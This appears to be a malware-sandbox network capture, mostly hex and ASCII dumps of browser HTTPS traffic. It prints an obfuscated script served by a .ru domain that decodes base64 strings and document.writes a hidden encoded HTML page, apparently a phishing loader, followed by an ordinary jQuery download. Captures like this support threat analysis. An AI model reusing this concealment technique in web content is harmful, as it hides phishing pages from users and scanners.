                                                                          2025-03-04 17:25:09 UTC762INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 4a 74 56 44 68 59 61 55 6c 76 64 57 74 44 4e 30 56 30 55 6c 4a 45 63 58 46 6f 61 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 51 30 6c 35 59 58 6f 7a 4e 45 52 53 4d 6d 6c 47 59 31 55 7a 57 6d 70 7a 4f 55 6c 50 55 6b 70 44 56 32 5a 54 51 6e 6c 79 52 48 52 35 4b 32 49 7a 4d 54 51 30 51 6a 68 4a 57 48 56 56 51 6d 6c 79 53 6b 74 54 62 54 6c 52 54 6a 46 6a 64 6d 39 75 55 32 56 6e 4c 32 74 46 57 58 56 77 64 79 39 76 4b 32 74 32 62 55 56 61 64 54 52 70 4d 32 31 6a 65 56 46 59 51 56 46 69 63 6b 74 78 59 57 4a 52 56 33 6c 45 59 55 56 74 63 30 59 34 54 58 41 30 61 6c 41 78 5a 6a 46 58 61 47 59 72 4d 33 56 52 53 55 55 7a 62 30 4a 4b 4e 57 63
                                                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlJtVDhYaUlvdWtDN0V0UlJEcXFoa1E9PSIsInZhbHVlIjoiQ0l5YXozNERSMmlGY1UzWmpzOUlPUkpDV2ZTQnlyRHR5K2IzMTQ0QjhJWHVVQmlySktTbTlRTjFjdm9uU2VnL2tFWXVwdy9vK2t2bUVadTRpM21jeVFYQVFicktxYWJRV3lEYUVtc0Y4TXA0alAxZjFXaGYrM3VRSUUzb0JKNWc
                                                                          2025-03-04 17:25:09 UTC1369INData Raw: 37 66 66 39 0d 0a 3c 73 63 72 69 70 74 3e 0a 6e 4b 6f 66 71 41 42 68 79 68 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 70 63 6b 6c 48 4c 6d 68 35 63 47 56 79 62 6d 56 7a 5a 48 51 75 63 6e 55 76 51 54 67 32 59 6d 70 49 4c 77 3d 3d 22 29 3b 0a 48 55 56 46 63 65 54 5a 62 68 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 42 68 56 6d 4c 68 6e 70 62 6f 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 6e 4b 6f 66 71 41 42 68 79 68 20 3d 3d 20 48 55 56 46 63 65 54 5a 62 68 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 42 68 56 6d 4c 68 6e 70 62 6f 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b
                                                                          Data Ascii: 7ff9<script>nKofqABhyh = atob("aHR0cHM6Ly9pcklHLmh5cGVybmVzZHQucnUvQTg2YmpILw==");HUVFceTZbh = atob("bm9tYXRjaA==");BhVmLhnpbo = atob("d3JpdGU=");if(nKofqABhyh == HUVFceTZbh){document[BhVmLhnpbo](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+
                                                                          2025-03-04 17:25:09 UTC1369INData Raw: 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37
                                                                          Data Ascii: Wk44Wk776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g776g44Wk44Wk776g44Wk776g776g44Wk776g44Wk44Wk776g776g44Wk44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g7
                                                                          2025-03-04 17:25:09 UTC1369INData Raw: 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37
                                                                          Data Ascii: k44Wk44Wk776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g44Wk776g776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk77
                                                                          2025-03-04 17:25:09 UTC1369INData Raw: 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57
                                                                          Data Ascii: 44Wk776g776g776g44Wk44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g776g44Wk776g44Wk776g776g776g776g776g44Wk776g776g776g44Wk776g776g44W
                                                                          2025-03-04 17:25:09 UTC1369INData Raw: 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67
                                                                          Data Ascii: 76g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g776g44Wk44Wk44Wk776g44Wk776g
                                                                          2025-03-04 17:25:09 UTC1369INData Raw: 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34
                                                                          Data Ascii: Wk776g776g776g44Wk776g44Wk776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk44Wk776g776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk4
                                                                          2025-03-04 17:25:09 UTC1369INData Raw: 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37
                                                                          Data Ascii: k44Wk44Wk776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g44Wk44Wk776g776g776g44Wk776g776g44Wk44Wk44Wk44Wk776g44Wk776g776g44Wk776g44Wk776g776g44Wk44Wk776g44Wk44Wk776g776g44Wk44Wk44Wk776g44Wk44Wk776g77
                                                                          2025-03-04 17:25:09 UTC1369INData Raw: 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57
                                                                          Data Ascii: 776g776g44Wk44Wk776g776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk776g776g44Wk44Wk44Wk44Wk776g776g44Wk776g776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk776g776g44Wk776g776g776g776g776g776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk776g776g776g44W
                                                                          2025-03-04 17:25:09 UTC1369INData Raw: 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67
                                                                          Data Ascii: 76g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk44Wk776g44Wk44Wk776g


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.649726151.101.194.1374437756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-03-04 17:25:10 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                          Host: code.jquery.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://1c.hypernesdt.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-03-04 17:25:10 UTC615INHTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Content-Length: 89501
                                                                          Server: nginx
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                          ETag: "28feccc0-15d9d"
                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                          Access-Control-Allow-Origin: *
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                          Accept-Ranges: bytes
                                                                          Date: Tue, 04 Mar 2025 17:25:10 GMT
                                                                          Age: 4862196
                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740031-EWR
                                                                          X-Cache: HIT, HIT
                                                                          X-Cache-Hits: 2774, 789
                                                                          X-Timer: S1741109111.764059,VS0,VE0
                                                                          Vary: Accept-Encoding
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                          2025-03-04 17:25:10 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
